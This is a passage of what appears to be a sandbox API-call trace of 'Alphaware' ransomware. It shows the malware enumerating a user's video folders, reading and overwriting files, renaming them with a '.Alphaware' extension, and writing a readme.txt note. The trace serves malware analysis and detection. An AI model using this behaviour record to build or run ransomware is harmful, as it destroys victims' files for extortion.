lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f4e83f0, ftCreationTime.dwHighDateTime=0x1d96b57, ftLastAccessTime.dwLowDateTime=0x237e5820, ftLastAccessTime.dwHighDateTime=0x1d975ea, ftLastWriteTime.dwLowDateTime=0x87b4e900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x82b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="FPYG UZhtS1g3J.mp4.Alphaware", cAlternateFileName="FPYGUZ~1.ALP")) returned 1 [0089.966] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x561df5c0, ftCreationTime.dwHighDateTime=0x1d96c39, ftLastAccessTime.dwLowDateTime=0xbeabf30, ftLastAccessTime.dwHighDateTime=0x1d972ae, ftLastWriteTime.dwLowDateTime=0x87c33140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6348, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMFeLCc5b-E2ysl3zF.avi.Alphaware", cAlternateFileName="IMFELC~1.ALP")) returned 1 [0089.966] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x879f7ca0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x879f7ca0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x879f7ca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0089.966] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57417410, ftCreationTime.dwHighDateTime=0x1d9678c, ftLastAccessTime.dwLowDateTime=0x3bec9a50, ftLastAccessTime.dwHighDateTime=0x1d9732b, ftLastWriteTime.dwLowDateTime=0x87d17980, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcc48, dwReserved0=0x0, dwReserved1=0x0, cFileName="ROOBM.avi.Alphaware", cAlternateFileName="ROOBMA~1.ALP")) returned 1 [0089.966] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57417410, ftCreationTime.dwHighDateTime=0x1d9678c, ftLastAccessTime.dwLowDateTime=0x3bec9a50, ftLastAccessTime.dwHighDateTime=0x1d9732b, ftLastWriteTime.dwLowDateTime=0x87d17980, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcc48, dwReserved0=0x0, dwReserved1=0x0, cFileName="ROOBM.avi.Alphaware", cAlternateFileName="ROOBMA~1.ALP")) returned 0 [0089.966] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0089.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0089.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0089.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0089.967] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ", nBufferLength=0x105, lpBuffer=0x23e500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ", lpFilePart=0x0) returned 0x2e [0089.967] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f2e8f20, ftCreationTime.dwHighDateTime=0x1d96d96, ftLastAccessTime.dwLowDateTime=0x1b820b90, ftLastAccessTime.dwHighDateTime=0x1d974f4, ftLastWriteTime.dwLowDateTime=0x1b820b90, ftLastWriteTime.dwHighDateTime=0x1d974f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0089.967] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f2e8f20, ftCreationTime.dwHighDateTime=0x1d96d96, ftLastAccessTime.dwLowDateTime=0x1b820b90, ftLastAccessTime.dwHighDateTime=0x1d974f4, ftLastWriteTime.dwLowDateTime=0x1b820b90, ftLastWriteTime.dwHighDateTime=0x1d974f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.967] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x490d69d0, ftCreationTime.dwHighDateTime=0x1d96e5d, ftLastAccessTime.dwLowDateTime=0xaa9f7c00, ftLastAccessTime.dwHighDateTime=0x1d972eb, ftLastWriteTime.dwLowDateTime=0xaa9f7c00, ftLastWriteTime.dwHighDateTime=0x1d972eb, nFileSizeHigh=0x0, nFileSizeLow=0x157c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="4Ieij.flv", cAlternateFileName="")) returned 1 [0089.967] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce1ef710, ftCreationTime.dwHighDateTime=0x1d970ce, ftLastAccessTime.dwLowDateTime=0x9665d350, ftLastAccessTime.dwHighDateTime=0x1d972ab, ftLastWriteTime.dwLowDateTime=0x9665d350, ftLastWriteTime.dwHighDateTime=0x1d972ab, nFileSizeHigh=0x0, nFileSizeLow=0x180f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="awU7DFoRrK67OUHE2Uat.mp4", cAlternateFileName="AWU7DF~1.MP4")) returned 1 [0089.968] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ef940, ftCreationTime.dwHighDateTime=0x1d96944, ftLastAccessTime.dwLowDateTime=0x7459fbd0, ftLastAccessTime.dwHighDateTime=0x1d96ccd, ftLastWriteTime.dwLowDateTime=0x7459fbd0, ftLastWriteTime.dwHighDateTime=0x1d96ccd, nFileSizeHigh=0x0, nFileSizeLow=0x23f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="JverrFiKHyZBVDqw.avi", cAlternateFileName="JVERRF~1.AVI")) returned 1 [0089.968] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0089.968] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0089.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0089.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0089.982] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\4Ieij.flv", nBufferLength=0x105, lpBuffer=0x23e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\4Ieij.flv", lpFilePart=0x0) returned 0x38 [0089.982] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\4Ieij.flv", dwFileAttributes=0x80) returned 1 [0089.982] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0089.982] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\4Ieij.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\4ieij.flv"), fInfoLevelId=0x0, lpFileInformation=0x2596178 | out: lpFileInformation=0x2596178*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x490d69d0, ftCreationTime.dwHighDateTime=0x1d96e5d, ftLastAccessTime.dwLowDateTime=0xaa9f7c00, ftLastAccessTime.dwHighDateTime=0x1d972eb, ftLastWriteTime.dwLowDateTime=0xaa9f7c00, ftLastWriteTime.dwHighDateTime=0x1d972eb, nFileSizeHigh=0x0, nFileSizeLow=0x157c2)) returned 1 [0089.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0089.983] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\4Ieij.flv", nBufferLength=0x105, lpBuffer=0x23e390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\4Ieij.flv", lpFilePart=0x0) returned 0x38 [0089.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0089.983] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\4Ieij.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\4ieij.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.988] GetFileType (hFile=0x250) returned 0x1 [0089.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0089.988] GetFileType (hFile=0x250) returned 0x1 [0089.988] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x157c2 [0089.988] ReadFile (in: hFile=0x250, lpBuffer=0x128d4258, nNumberOfBytesToRead=0x157c2, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x128d4258*, lpNumberOfBytesRead=0x23e958*=0x157c2, lpOverlapped=0x0) returned 1 [0089.990] CloseHandle (hObject=0x250) returned 1 [0090.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0090.060] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\4Ieij.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\4ieij.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.062] GetFileType (hFile=0x250) returned 0x1 [0090.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0090.062] GetFileType (hFile=0x250) returned 0x1 [0090.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0090.067] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\4Ieij.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\4ieij.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x490d69d0, ftCreationTime.dwHighDateTime=0x1d96e5d, ftLastAccessTime.dwLowDateTime=0xaa9f7c00, ftLastAccessTime.dwHighDateTime=0x1d972eb, ftLastWriteTime.dwLowDateTime=0x87e22320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1cb34)) returned 1 [0090.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0090.067] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\4Ieij.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\4ieij.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\4Ieij.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\4ieij.flv.alphaware")) returned 1 [0090.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0090.071] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.071] GetFileType (hFile=0x250) returned 0x1 [0090.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0090.071] GetFileType (hFile=0x250) returned 0x1 [0090.073] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\awU7DFoRrK67OUHE2Uat.mp4", dwFileAttributes=0x80) returned 1 [0090.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0090.073] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\awU7DFoRrK67OUHE2Uat.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\awu7dforrk67ouhe2uat.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23eaa50 | out: lpFileInformation=0x23eaa50*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce1ef710, ftCreationTime.dwHighDateTime=0x1d970ce, ftLastAccessTime.dwLowDateTime=0x9665d350, ftLastAccessTime.dwHighDateTime=0x1d972ab, ftLastWriteTime.dwLowDateTime=0x9665d350, ftLastWriteTime.dwHighDateTime=0x1d972ab, nFileSizeHigh=0x0, nFileSizeLow=0x180f4)) returned 1 [0090.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0090.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0090.074] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\awU7DFoRrK67OUHE2Uat.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\awu7dforrk67ouhe2uat.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.074] GetFileType (hFile=0x250) returned 0x1 [0090.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0090.074] GetFileType (hFile=0x250) returned 0x1 [0090.074] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x180f4 [0090.074] ReadFile (in: hFile=0x250, lpBuffer=0x12922f70, nNumberOfBytesToRead=0x180f4, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x12922f70*, lpNumberOfBytesRead=0x23e958*=0x180f4, lpOverlapped=0x0) returned 1 [0090.076] CloseHandle (hObject=0x250) returned 1 [0090.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0090.105] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\awU7DFoRrK67OUHE2Uat.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\awu7dforrk67ouhe2uat.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.108] GetFileType (hFile=0x250) returned 0x1 [0090.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0090.108] GetFileType (hFile=0x250) returned 0x1 [0090.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0090.112] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\awU7DFoRrK67OUHE2Uat.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\awu7dforrk67ouhe2uat.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce1ef710, ftCreationTime.dwHighDateTime=0x1d970ce, ftLastAccessTime.dwLowDateTime=0x9665d350, ftLastAccessTime.dwHighDateTime=0x1d972ab, ftLastWriteTime.dwLowDateTime=0x87e94740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20220)) returned 1 [0090.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0090.112] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\awU7DFoRrK67OUHE2Uat.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\awu7dforrk67ouhe2uat.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\awU7DFoRrK67OUHE2Uat.mp4.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\awu7dforrk67ouhe2uat.mp4.alphaware")) returned 1 [0090.113] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\JverrFiKHyZBVDqw.avi", dwFileAttributes=0x80) returned 1 [0090.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0090.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\JverrFiKHyZBVDqw.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\jverrfikhyzbvdqw.avi"), fInfoLevelId=0x0, lpFileInformation=0x24691a0 | out: lpFileInformation=0x24691a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x11ef940, ftCreationTime.dwHighDateTime=0x1d96944, ftLastAccessTime.dwLowDateTime=0x7459fbd0, ftLastAccessTime.dwHighDateTime=0x1d96ccd, ftLastWriteTime.dwLowDateTime=0x7459fbd0, ftLastWriteTime.dwHighDateTime=0x1d96ccd, nFileSizeHigh=0x0, nFileSizeLow=0x23f5)) returned 1 [0090.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0090.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0090.114] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\JverrFiKHyZBVDqw.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\jverrfikhyzbvdqw.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.114] GetFileType (hFile=0x250) returned 0x1 [0090.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0090.115] GetFileType (hFile=0x250) returned 0x1 [0090.115] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x23f5 [0090.115] ReadFile (in: hFile=0x250, lpBuffer=0x2469458, nNumberOfBytesToRead=0x23f5, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2469458*, lpNumberOfBytesRead=0x23e958*=0x23f5, lpOverlapped=0x0) returned 1 [0090.116] CloseHandle (hObject=0x250) returned 1 [0090.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0090.137] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\JverrFiKHyZBVDqw.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\jverrfikhyzbvdqw.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.138] GetFileType (hFile=0x250) returned 0x1 [0090.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0090.138] GetFileType (hFile=0x250) returned 0x1 [0090.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0090.141] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\JverrFiKHyZBVDqw.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\jverrfikhyzbvdqw.avi"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ef940, ftCreationTime.dwHighDateTime=0x1d96944, ftLastAccessTime.dwLowDateTime=0x7459fbd0, ftLastAccessTime.dwHighDateTime=0x1d96ccd, ftLastWriteTime.dwLowDateTime=0x87ee0a00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x30c8)) returned 1 [0090.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0090.141] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\JverrFiKHyZBVDqw.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\jverrfikhyzbvdqw.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\eUSZ\\JverrFiKHyZBVDqw.avi.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\eusz\\jverrfikhyzbvdqw.avi.alphaware")) returned 1 [0090.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0090.142] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f2e8f20, ftCreationTime.dwHighDateTime=0x1d96d96, ftLastAccessTime.dwLowDateTime=0x87ee0a00, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x87ee0a00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.142] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x490d69d0, ftCreationTime.dwHighDateTime=0x1d96e5d, ftLastAccessTime.dwLowDateTime=0xaa9f7c00, ftLastAccessTime.dwHighDateTime=0x1d972eb, ftLastWriteTime.dwLowDateTime=0x87e22320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1cb34, dwReserved0=0x0, dwReserved1=0x0, cFileName="4Ieij.flv.Alphaware", cAlternateFileName="4IEIJF~1.ALP")) returned 1 [0090.142] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce1ef710, ftCreationTime.dwHighDateTime=0x1d970ce, ftLastAccessTime.dwLowDateTime=0x9665d350, ftLastAccessTime.dwHighDateTime=0x1d972ab, ftLastWriteTime.dwLowDateTime=0x87e94740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20220, dwReserved0=0x0, dwReserved1=0x0, cFileName="awU7DFoRrK67OUHE2Uat.mp4.Alphaware", cAlternateFileName="AWU7DF~1.ALP")) returned 1 [0090.142] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ef940, ftCreationTime.dwHighDateTime=0x1d96944, ftLastAccessTime.dwLowDateTime=0x7459fbd0, ftLastAccessTime.dwHighDateTime=0x1d96ccd, ftLastWriteTime.dwLowDateTime=0x87ee0a00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x30c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="JverrFiKHyZBVDqw.avi.Alphaware", cAlternateFileName="JVERRF~1.ALP")) returned 1 [0090.142] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87e22320, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x87e22320, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x87e22320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0090.142] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87e22320, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x87e22320, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x87e22320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0090.142] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0090.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0090.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0090.143] CoTaskMemAlloc (cb=0x20c) returned 0xd85a10 [0090.144] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0xd85a10 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0090.144] CoTaskMemFree (pv=0xd85a10) [0090.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0090.144] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x74412c80, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x74412c80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.145] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1f5de560, ftCreationTime.dwHighDateTime=0x1d96b60, 